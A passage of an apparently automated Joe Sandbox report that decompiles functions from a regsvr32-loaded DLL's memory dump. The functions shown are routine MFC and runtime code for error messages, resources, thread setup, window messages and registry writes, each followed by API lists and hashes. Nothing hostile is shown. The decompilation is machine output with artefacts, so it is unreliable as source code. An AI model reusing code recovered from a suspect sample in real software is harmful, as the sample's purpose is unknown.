                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                        				goto L8;
                                                                                                        			}





















                                                                                                        0x100145b9
                                                                                                        0x100145b9
                                                                                                        0x100145c3
                                                                                                        0x100145c5
                                                                                                        0x100145cc
                                                                                                        0x100146a4
                                                                                                        0x100146af
                                                                                                        0x100146af
                                                                                                        0x100145d2
                                                                                                        0x100145d5
                                                                                                        0x100145d8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100145e1
                                                                                                        0x10014625
                                                                                                        0x10014625
                                                                                                        0x1001462b
                                                                                                        0x10014638
                                                                                                        0x1001463c
                                                                                                        0x100146a3
                                                                                                        0x00000000
                                                                                                        0x10014642
                                                                                                        0x10014642
                                                                                                        0x10014645
                                                                                                        0x10014647
                                                                                                        0x10014658
                                                                                                        0x1001465f
                                                                                                        0x10014661
                                                                                                        0x10014664
                                                                                                        0x10014668
                                                                                                        0x1001466a
                                                                                                        0x1001466c
                                                                                                        0x1001466d
                                                                                                        0x10014672
                                                                                                        0x10014675
                                                                                                        0x10014678
                                                                                                        0x1001467e
                                                                                                        0x10014685
                                                                                                        0x1001468d
                                                                                                        0x10014690
                                                                                                        0x100146a0
                                                                                                        0x100146a0
                                                                                                        0x10014690
                                                                                                        0x00000000
                                                                                                        0x1001465f
                                                                                                        0x10014649
                                                                                                        0x10014656
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014656
                                                                                                        0x1001463c
                                                                                                        0x100145e7
                                                                                                        0x100145e9
                                                                                                        0x100145f0
                                                                                                        0x100145f2
                                                                                                        0x100145f5
                                                                                                        0x100145f7
                                                                                                        0x100145fb
                                                                                                        0x100145fb
                                                                                                        0x100145f7
                                                                                                        0x100145f0
                                                                                                        0x10014600
                                                                                                        0x10014608
                                                                                                        0x10014610
                                                                                                        0x10014618
                                                                                                        0x10014620
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __msize_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1288803200-0
                                                                                                        • Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                        • Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
                                                                                                        • Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                        • Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                                                                        				intOrPtr* _v0;
                                                                                                        				void* _v4;
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v16;
                                                                                                        				void* _t20;
                                                                                                        				intOrPtr* _t23;
                                                                                                        				void* _t29;
                                                                                                        				void* _t31;
                                                                                                        				intOrPtr _t35;
                                                                                                        				char _t36;
                                                                                                        				void* _t40;
                                                                                                        				void* _t42;
                                                                                                        				void* _t44;
                                                                                                        
                                                                                                        				_t44 = __eflags;
                                                                                                        				_t38 = __esi;
                                                                                                        				_t37 = __edi;
                                                                                                        				_t31 = __ebx;
                                                                                                        				_push(4);
                                                                                                        				E10017BC1(E10027DA5, __ebx, __edi, __esi);
                                                                                                        				_t35 = E10009B91(_t44, 0xc);
                                                                                                        				_v16 = _t35;
                                                                                                        				_t20 = 0;
                                                                                                        				_v4 = 0;
                                                                                                        				if(_t35 != 0) {
                                                                                                        					_t20 = E10009CDE(_t35);
                                                                                                        				}
                                                                                                        				_t36 = _a4;
                                                                                                        				_v8 = _v8 | 0xffffffff;
                                                                                                        				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                                                                        				_a4 = _t20;
                                                                                                        				E10017C83( &_a4, 0x1002e16c);
                                                                                                        				asm("int3");
                                                                                                        				_t40 = _t42;
                                                                                                        				_t23 = _v0;
                                                                                                        				_push(_t31);
                                                                                                        				if(_t23 != 0) {
                                                                                                        					 *_t23 = 0;
                                                                                                        				}
                                                                                                        				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                                                                        					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                                                                        					LocalFree(_a12);
                                                                                                        					_t29 = 1;
                                                                                                        					__eflags = 1;
                                                                                                        				} else {
                                                                                                        					 *_a4 = 0;
                                                                                                        					_t29 = 0;
                                                                                                        				}
                                                                                                        				return _t29;
                                                                                                        			}
















                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d3b
                                                                                                        0x10009d48
                                                                                                        0x10009d4a
                                                                                                        0x10009d4d
                                                                                                        0x10009d51
                                                                                                        0x10009d54
                                                                                                        0x10009d56
                                                                                                        0x10009d56
                                                                                                        0x10009d5b
                                                                                                        0x10009d5e
                                                                                                        0x10009d62
                                                                                                        0x10009d65
                                                                                                        0x10009d71
                                                                                                        0x10009d76
                                                                                                        0x10009d78
                                                                                                        0x10009d7a
                                                                                                        0x10009d7d
                                                                                                        0x10009d82
                                                                                                        0x10009d84
                                                                                                        0x10009d84
                                                                                                        0x10009da2
                                                                                                        0x10009db8
                                                                                                        0x10009dc3
                                                                                                        0x10009dcb
                                                                                                        0x10009dcb
                                                                                                        0x10009da4
                                                                                                        0x10009da7
                                                                                                        0x10009da9
                                                                                                        0x10009da9
                                                                                                        0x10009dce

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10009D3B
                                                                                                          • Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 10009D71
                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A
                                                                                                          • Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D
                                                                                                        • LocalFree.KERNEL32(?), ref: 10009DC3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 1615547351-0
                                                                                                        • Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                        • Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
                                                                                                        • Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                        • Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E1000C887(void* __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t23;
                                                                                                        				void* _t28;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t32;
                                                                                                        				signed int _t34;
                                                                                                        				signed short _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed short* _t40;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_push(_t28);
                                                                                                        				_t37 = __ecx;
                                                                                                        				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                        				_t40 =  *(__ecx + 0x60);
                                                                                                        				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                        					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                        					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					_t40 = LockResource(_v8);
                                                                                                        				}
                                                                                                        				_t30 = 1;
                                                                                                        				if(_t40 != 0) {
                                                                                                        					_t35 =  *_t40;
                                                                                                        					if(_t40[1] != 0xffff) {
                                                                                                        						_t23 = _t40[5] & 0x0000ffff;
                                                                                                        						_t34 = _t40[6] & 0x0000ffff;
                                                                                                        					} else {
                                                                                                        						_t35 = _t40[6];
                                                                                                        						_t23 = _t40[9] & 0x0000ffff;
                                                                                                        						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                        					}
                                                                                                        					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                        						_t30 = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if( *(_t37 + 0x58) != 0) {
                                                                                                        					FreeResource(_v8);
                                                                                                        				}
                                                                                                        				return _t30;
                                                                                                        			}
















                                                                                                        0x1000c88a
                                                                                                        0x1000c88b
                                                                                                        0x1000c88e
                                                                                                        0x1000c890
                                                                                                        0x1000c897
                                                                                                        0x1000c89a
                                                                                                        0x1000c89d
                                                                                                        0x1000c8a4
                                                                                                        0x1000c8bb
                                                                                                        0x1000c8bb
                                                                                                        0x1000c8c2
                                                                                                        0x1000c8cd
                                                                                                        0x1000c8cd
                                                                                                        0x1000c8d1
                                                                                                        0x1000c8d4
                                                                                                        0x1000c8dc
                                                                                                        0x1000c8de
                                                                                                        0x1000c8ed
                                                                                                        0x1000c8f1
                                                                                                        0x1000c8e0
                                                                                                        0x1000c8e0
                                                                                                        0x1000c8e3
                                                                                                        0x1000c8e7
                                                                                                        0x1000c8e7
                                                                                                        0x1000c8fa
                                                                                                        0x1000c906
                                                                                                        0x1000c906
                                                                                                        0x1000c8fa
                                                                                                        0x1000c90c
                                                                                                        0x1000c911
                                                                                                        0x1000c911
                                                                                                        0x1000c91d

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
                                                                                                        • LockResource.KERNEL32(00000000), ref: 1000C8C7
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 1000C911
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                        • Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
                                                                                                        • Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                        • Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t37;
                                                                                                        				intOrPtr _t43;
                                                                                                        				void* _t45;
                                                                                                        				intOrPtr* _t51;
                                                                                                        				void* _t52;
                                                                                                        				void* _t53;
                                                                                                        
                                                                                                        				_t53 = __eflags;
                                                                                                        				_t46 = __ecx;
                                                                                                        				_t44 = __ebx;
                                                                                                        				_push(4);
                                                                                                        				E10017BC1(E10027E86, __ebx, __edi, __esi);
                                                                                                        				_t51 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                                                                        				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
                                                                                                        				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                                                                        				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                        				 *_t51 = 0x10029f54;
                                                                                                        				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                                                                        					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                                                                        				} else {
                                                                                                        					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
                                                                                                        					_pop(_t46);
                                                                                                        					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                                                                        				}
                                                                                                        				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
                                                                                                        				_t55 = _t45;
                                                                                                        				if(_t45 == 0) {
                                                                                                        					L4:
                                                                                                        					E1000A0DB(_t45, _t46, 0, _t51, _t55);
                                                                                                        				}
                                                                                                        				_t7 = _t45 + 0x74; // 0x74
                                                                                                        				_t46 = _t7;
                                                                                                        				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
                                                                                                        				if(_t37 == 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                                                                        				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                                                                        				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                                                                        				 *((short*)(_t51 + 0x92)) = 0;
                                                                                                        				 *((short*)(_t51 + 0x90)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                                                                        				return E10017C60(_t51);
                                                                                                        			}









                                                                                                        0x1000adb5
                                                                                                        0x1000adb5
                                                                                                        0x1000adb5
                                                                                                        0x1000adb5
                                                                                                        0x1000adbc
                                                                                                        0x1000adc1
                                                                                                        0x1000adc3
                                                                                                        0x1000adc6
                                                                                                        0x1000adcd
                                                                                                        0x1000add0
                                                                                                        0x1000add3
                                                                                                        0x1000add9
                                                                                                        0x1000ade9
                                                                                                        0x1000addb
                                                                                                        0x1000adde
                                                                                                        0x1000ade3
                                                                                                        0x1000ade4
                                                                                                        0x1000ade4
                                                                                                        0x1000adf1
                                                                                                        0x1000adf3
                                                                                                        0x1000adf5
                                                                                                        0x1000adf7
                                                                                                        0x1000adf7
                                                                                                        0x1000adf7
                                                                                                        0x1000adfc
                                                                                                        0x1000adfc
                                                                                                        0x1000adff
                                                                                                        0x1000ae06
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ae08
                                                                                                        0x1000ae11
                                                                                                        0x1000ae1a
                                                                                                        0x1000ae1d
                                                                                                        0x1000ae20
                                                                                                        0x1000ae23
                                                                                                        0x1000ae26
                                                                                                        0x1000ae29
                                                                                                        0x1000ae2c
                                                                                                        0x1000ae2f
                                                                                                        0x1000ae32
                                                                                                        0x1000ae38
                                                                                                        0x1000ae3b
                                                                                                        0x1000ae42
                                                                                                        0x1000ae49
                                                                                                        0x1000ae4c
                                                                                                        0x1000ae52
                                                                                                        0x1000ae58
                                                                                                        0x1000ae5e
                                                                                                        0x1000ae61
                                                                                                        0x1000ae64
                                                                                                        0x1000ae6a
                                                                                                        0x1000ae70
                                                                                                        0x1000ae73
                                                                                                        0x1000ae76
                                                                                                        0x1000ae87

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000ADBC
                                                                                                          • Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869
                                                                                                        • __strdup.LIBCMT ref: 1000ADDE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 1000AE0B
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1000AE14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                        • String ID:
                                                                                                        • API String ID: 4206445780-0
                                                                                                        • Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                        • Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
                                                                                                        • Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                        • Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E1001170E(intOrPtr* __ecx) {
                                                                                                        				char _v20;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				intOrPtr* __esi;
                                                                                                        				struct HWND__* _t18;
                                                                                                        				void* _t24;
                                                                                                        				intOrPtr _t29;
                                                                                                        				intOrPtr* _t33;
                                                                                                        
                                                                                                        				_t28 = __ecx;
                                                                                                        				_push(0);
                                                                                                        				_t33 = __ecx;
                                                                                                        				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                                                                        					__eax =  *__esi;
                                                                                                        					__ecx = __esi;
                                                                                                        					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                                                                        				}
                                                                                                        				_t30 = SendMessageA;
                                                                                                        				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                        				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                        				_t28 = _t33;
                                                                                                        				_t33 = E10010DEC(0, _t28, SendMessageA);
                                                                                                        				if(_t33 != 0) {
                                                                                                        					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                        					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                        					_t18 = GetCapture();
                                                                                                        					if(_t18 != 0) {
                                                                                                        						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                                                                        					}
                                                                                                        					return _t18;
                                                                                                        				} else {
                                                                                                        					_push(_t28);
                                                                                                        					_v20 = 0x10057298;
                                                                                                        					E10017C83( &_v20, 0x1002e2fc);
                                                                                                        					asm("int3");
                                                                                                        					_push(4);
                                                                                                        					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
                                                                                                        					_t29 = E10013965(0x104);
                                                                                                        					_v32 = _t29;
                                                                                                        					_t24 = 0;
                                                                                                        					_v20 = 0;
                                                                                                        					if(_t29 != 0) {
                                                                                                        						_t24 = E1000CF71(_t29);
                                                                                                        					}
                                                                                                        					return E10017C60(_t24);
                                                                                                        				}
                                                                                                        			}












                                                                                                        0x1001170e
                                                                                                        0x1001170e
                                                                                                        0x10011710
                                                                                                        0x1001171d
                                                                                                        0x1001171f
                                                                                                        0x10011721
                                                                                                        0x10011723
                                                                                                        0x10011723
                                                                                                        0x10011729
                                                                                                        0x10011738
                                                                                                        0x10011745
                                                                                                        0x1001174a
                                                                                                        0x10011751
                                                                                                        0x10011755
                                                                                                        0x10011763
                                                                                                        0x10011770
                                                                                                        0x10011775
                                                                                                        0x1001177d
                                                                                                        0x10011784
                                                                                                        0x10011784
                                                                                                        0x10011789
                                                                                                        0x10011757
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011738
                                                                                                        • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011763
                                                                                                          • Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                        • GetCapture.USER32 ref: 10011775
                                                                                                        • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 10011784
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CaptureWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 729421689-0
                                                                                                        • Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                        • Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
                                                                                                        • Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                        • Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v24;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t13;
                                                                                                        				CHAR* _t21;
                                                                                                        				char* _t24;
                                                                                                        				intOrPtr _t28;
                                                                                                        				void* _t30;
                                                                                                        				signed int _t31;
                                                                                                        
                                                                                                        				_t28 = __edx;
                                                                                                        				_t13 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t13 ^ _t31;
                                                                                                        				_t24 = _a8;
                                                                                                        				_t30 = __ecx;
                                                                                                        				_t29 = _a4;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                        					E10016DF0( &_v24, 0x10, "%d", _a12);
                                                                                                        					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                        				} else {
                                                                                                        					_t30 = E10013ED1(__ecx, _t29);
                                                                                                        					if(_t30 != 0) {
                                                                                                        						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                        						_t29 = _t21;
                                                                                                        						RegCloseKey(_t30);
                                                                                                        						_t18 = 0 | _t21 == 0x00000000;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                        			}














                                                                                                        0x10013f17
                                                                                                        0x10013f1d
                                                                                                        0x10013f24
                                                                                                        0x10013f28
                                                                                                        0x10013f2c
                                                                                                        0x10013f33
                                                                                                        0x10013f36
                                                                                                        0x10013f76
                                                                                                        0x10013f87
                                                                                                        0x10013f38
                                                                                                        0x10013f3e
                                                                                                        0x10013f42
                                                                                                        0x10013f50
                                                                                                        0x10013f57
                                                                                                        0x10013f59
                                                                                                        0x10013f63
                                                                                                        0x10013f63
                                                                                                        0x10013f42
                                                                                                        0x10013f9b

                                                                                                        APIs
                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 10013F59
                                                                                                        • _swprintf.LIBCMT ref: 10013F76
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClosePrivateProfileStringValueWrite_swprintf
